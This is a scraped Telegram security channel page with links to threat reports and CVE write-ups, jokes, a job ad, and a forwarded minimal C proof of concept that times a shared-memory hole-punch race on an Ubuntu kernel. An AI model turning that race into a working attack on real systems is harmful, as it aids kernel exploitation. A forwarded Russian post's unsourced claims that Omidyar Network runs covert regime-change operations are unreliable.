Source Byte – Telegram
Source Byte
7.73K subscribers
845 photos
72 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
Morphisec Thwarts Russian-Linked StealC V2 Campaign Targeting Blender Users via Malicious .blend Files

https://www.morphisec.com/blog/morphisec-thwarts-russian-linked-stealc-v2-campaign-targeting-blender-users-via-malicious-blend-files/
3👍2👎1🤯1
شرکت فناوری اطلاعات بانک تجارت به‌منظور تکمیل و تقویت تیم‌های تخصصی خود، از کارشناسان توانمند و باانگیزه دعوت به همکاری می‌نماید.
کارشناس ارشد تیم قرمز
• آشنایی با فرآیندها و فعالیت‌های تیم قرمز
• توانایی اجرای ارزیابی‌های امنیتی و پیاده‌سازی حملات مربوط به اکتیو دایرکتوری
• تجربه کار در حوزه شبیه‌سازی حملات بر اساس MITRE ATT&CK
• مهارت کار تیمی و ارائه پیشنهادهای فنی برای ارتقای امنیت

مزایا و شرایط همکاری پس از انجام مصاحبه تعیین خواهد شد.
علاقه‌مندان می‌توانند رزومه خود را از طریق لینکدین یا ایمیل ارسال نمایند.
seclab@tejaratbank.ir
221👎6
Look like AI generated🤔


(i steal this photo from other channel don't know channel name)
😁7👍42🔥1
😂
WTF is this
😁7🗿4
Source Byte
let me guess , it's CVE-2025-8088 ? md5 : 391325100384964325ed4ace788c8bc2
CVE-2025-80880 🤔
A new wiper attack has been identified by ClearSky Cyber Security affecting Ukraine.
We named this wiper "GamaWiper" (VBS-based wiper).The intrusion chain begins with the exploitation of a vulnerable WinRAR version (CVE-2025-80880). We assess with moderate confidence that this activity is linked to the Gamaredon APT group. This marks the first observed instance of Gamaredon conducting destructive operations rather than its traditional espionage activities


Related IoCs
6
K7 Antivirus: Named pipe abuse, registry manipulation and privilege escalation

https://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulation-and-privilege-escalation.html

#CVE-2024-36424
6🤔2
React2Shell (CVE-2025-55182) Exploitation: Real-World Incident Response to XMRig Cryptominer Attack

https://raminfp.info/blog/server-compromise-xmrig-cryptominer-incident/
5
Sliver C2 Insecure Default Network Policy (#CVE-2025-27093)

https://hngnh.com/posts/Sliver-CVE-2025-27093/
3
REMOTE WINDOWS CREDENTIAL DUMP WITH SHADOW SNAPSHOTS: EXPLOITATION AND DETECTION


https://labs.itresit.es/2025/06/11/remote-windows-credential-dump-with-shadow-snapshots-exploitation-and-detection/
👍7
3
Beyond XSS: Explore the Web Front-end Security Universe


https://aszx87410.github.io/beyond-xss/en/
10
Forwarded from CyberSecurityTechnologies
HarmonyOS_NEXT_Offensive_Testing.pdf
3.8 MB
#tools
#Mobile_Security
"Breaking The Harmony: Offensive Testing Of HarmonyOS NEXT Applications With Harm0nyz3r & DVHA", Black Hat Europe 2025.
]-> Harmony OS Next Analysis Tool
]-> Damn Vulnerable Harmony Application

// This talk presents the results of a security assessment of HarmonyOS NEXT and its application ecosystem, combining a custom-built testing framework (Harm0nyz3r) with a purposely vulnerable application (Damn Vulnerable HarmonyOS Application - DVHA). Live demonstrations will show how Harm0nyz3r maps an application's attack surface, crafts malicious payloads, and successfully exploits vulnerabilities in DVHA..
5
Sec Note
Russian Cyber Army. Who is it?
WTF ?

i think "Sova Sonya" is from زنجان
😁26👍1
Forwarded from Proxy Bar
Ubuntu 25.04 (ядро 6.14.11)
минимальный POC
What ?

#define _GNU_SOURCE
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <linux/falloc.h>
#include <err.h>
#include <pthread.h>

#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

#define FALLOC_LEN 64 * 1024 * 1024 // Max on Ubuntu 25.04

pthread_barrier_t barrier;
int ffd;
char *fmap;

void hole_punch() {
SYSCHK(ffd = open("/dev/shm/", O_TMPFILE | O_RDWR, 0666));
SYSCHK(fallocate(ffd, 0, 0, FALLOC_LEN));
SYSCHK(fmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, ffd, 0));

pthread_barrier_wait(&barrier); // barrier 1
SYSCHK(fallocate(ffd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, FALLOC_LEN));
}

int main(void) {
pthread_barrier_init(&barrier, NULL, 2);

pthread_t hole_punch_thread;
SYSCHK(pthread_create(&hole_punch_thread, NULL, (void*)hole_punch, NULL));

struct timespec start, end;
pthread_barrier_wait(&barrier); // barrier 1

clock_gettime(CLOCK_MONOTONIC, &start);
volatile char dummy = *(char *)fmap; // Simulated kernel access during hole punch
clock_gettime(CLOCK_MONOTONIC, &end);

long long stall_ns = (end.tv_sec - start.tv_sec) * 1000000000LL + (end.tv_nsec - start.tv_nsec);

printf("Stall time: %lld ns\n", stall_ns);
}
🥰3
Omidyar Network.pdf
2.7 MB
🙃🧑👨👩‍🦱🧑‍🦱😍 Omidyar Network

Этот материал подготовлен выпускниками курса «Разведывательный анализ информации» Университета Прокси-разведки.

Omidyar Network представляет собой не традиционную благотворительную структуру, а сложный гибридный институт глобального влияния, совмещающий функции частного инвестиционного фонда, венчурного акселератора и оператора инструментов «мягкой силы» Соединённых Штатов Америки. Деятельность организации направлена на поддержание геополитических и идеологических интересов западной либеральной элиты.

Под видом поддержки «социального предпринимательства», «финансовой инклюзии» и «независимой журналистики» Omidyar Network участвует в гибридных режимных операциях, включая финансирование антиправительственных структур в ходе событий на Украине (2013–2014), а также поддержку дестабилизационных протестных движений в Нигерии, Филиппинах и других странах. Организация тесно взаимодействует с ключевыми внешнеполитическими структурами архитектуры США, в частности, с Агентством США по международному развитию (USAID) и Национальным фондом демократии (NED) , а также с крупнейшими филантропическими платформами, включая Фонд Сороса, Фонд Билла и Мелинды Гейтс, и другие, формируя коалиционную сеть, координирующую глобальную повестку в области «демократии», «цифровых прав» и «гражданского общества».

Особую обеспокоенность вызывает реализуемая фондом стратегия «цифровой трансформации», включающая такие инициативы, как MOSIP (модульная платформа цифровой идентификации), Better Than Cash Alliance и глобальную кампанию «50-in-5» по внедрению цифровой общественной инфраструктуры (DPI). Данные проекты создают основу для тотального контроля: через универсальную цифровую идентификацию, обязательный переход к безналичным расчётам, а также алгоритмические системы оценки поведения граждан.

Таким образом, Omidyar Network функционирует как один из наиболее влиятельных нетрадиционных инструментов внешнего воздействия, действующий в рамках формальной легальности, но по существу являющийся частно-государственным аппаратом системного вмешательства, маскирующим политическую инженерию под филантропию и технологический прогресс.

🥼🦺👚👕👖🩲🩳
Please open Telegram to view this post
VIEW IN TELEGRAM
2😁1